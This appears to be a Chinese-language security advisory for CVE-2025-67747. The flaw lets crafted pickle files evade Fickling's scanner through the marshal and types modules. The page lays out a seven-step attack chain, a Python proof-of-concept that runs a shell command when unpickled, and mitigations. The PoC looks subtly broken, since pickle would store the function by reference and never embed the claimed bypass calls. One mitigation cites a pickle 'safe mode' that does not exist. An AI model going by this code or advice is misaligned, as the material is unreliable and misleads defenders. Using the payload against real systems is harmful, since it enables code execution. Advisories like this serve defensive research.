CVE-2025-67747 Fickling不安全反序列化远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-67747

漏洞类型

远程代码执行

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Fickling

漏洞概述

Fickling是一个Python pickle反序列化工具和静态分析器，广泛应用于安全检测和代码分析领域。该工具旨在帮助开发者和安全研究人员检测恶意pickle文件，防止潜在的安全风险。然而，在0.1.6版本之前，Fickling的安全检测机制存在严重缺陷，其模块拦截列表中缺少对`marshal`和`types`模块的有效阻止。这一设计漏洞使得攻击者能够利用`types.FunctionType`和`marshal.loads`等被遗漏的模块构造特殊的恶意pickle文件，从而绕过Fickling的安全检测。当用户使用Fickling对文件进行安全审查后，认为文件安全而进行反序列化操作时，将无意中在系统上执行任意代码。该漏洞严重影响所有使用Fickling进行pickle文件安全审查的用户和系统，可能导致敏感数据泄露、系统完全沦陷等严重后果。攻击具有本地特性，需要用户交互，但一旦利用成功，攻击者可以获得系统完全控制权。

技术细节

Fickling作为Python pickle文件的静态分析工具，通过维护一个不安全模块和函数的拦截列表来检测潜在的恶意代码。在正常情况下，当检测到`pickle.loads`调用或反序列化操作时，Fickling会分析pickle字节码，查找是否存在危险操作。然而，由于版本0.1.6之前的Fickling未将`marshal`和`types`模块加入拦截列表，攻击者可以利用`types.FunctionType`构造任意函数对象，并通过`marshal.loads`加载预编译的字节码来绕过检测。具体而言，攻击者可以创建一个包含`types.FunctionType`和`marshal.loads`调用的pickle文件，这些操作不会被Fickling标记为危险。攻击的核心在于Fickling的AST分析和字节码检测逻辑存在盲区，无法识别通过这些被忽略模块构造的恶意payload。当受害者使用存在漏洞的Fickling版本扫描文件后，系统会认为该文件安全，随后的反序列化操作将触发代码执行。攻击者可以利用此漏洞执行任意Python代码，包括但不限于文件读写、网络连接、命令执行等操作。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统中使用的Fickling版本，确认版本低于0.1.6

STEP 2

步骤2

攻击者构造恶意pickle文件，利用types.FunctionType和marshal.loads绕过Fickling的模块拦截列表

STEP 3

步骤3

攻击者将恶意pickle文件伪装成正常文件，通过钓鱼邮件、恶意下载链接或供应链攻击等方式传递给受害者

STEP 4

步骤4

受害者使用存在漏洞的Fickling版本对文件进行安全扫描

STEP 5

步骤5

Fickling未能检测到恶意代码，错误地判定文件安全

STEP 6

步骤6

受害者在不知情的情况下对文件进行反序列化操作，触发任意代码执行

STEP 7

步骤7

攻击者获得系统访问权限，可执行进一步的攻击行为如数据窃取、权限提升或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import pickle
import types
import marshal

# Generate malicious code execution payload
def malicious_code():
    import os
    os.system('whoami > /tmp/pwned.txt')

# Serialize the malicious function
malicious_bytecode = marshal.dumps(malicious_code.__code__)

# Create a pickle payload using FunctionType and marshal.loads
# This bypasses Fickling's security checks
payload = pickle.dumps({
    'func': types.FunctionType(
        marshal.loads(malicious_bytecode),
        globals()
    )
})

# Write the malicious pickle file
with open('malicious.pkl', 'wb') as f:
    f.write(payload)

print('[+] Malicious pickle file created: malicious.pkl')
print('[+] This file bypasses Fickling < 0.1.6 detection')

# To demonstrate the exploitation
print('[*] Simulating victim deserialization...')
data = pickle.loads(payload)
data['func']()

影响范围

Fickling < 0.1.6

防御指南

临时缓解措施

在完成官方升级前，可采取以下临时缓解措施：1) 对所有外部来源的pickle文件进行严格来源验证和完整性校验；2) 使用自定义的Unpickler类限制可导入的模块和可执行的操作；3) 启用Python的pickle安全模式，禁用危险操作；4) 考虑使用JSON、MessagePack等更安全的序列化格式替代pickle；5) 在反序列化前对pickle文件进行手动代码审查；6) 限制运行反序列化代码的进程权限，采用最小权限原则。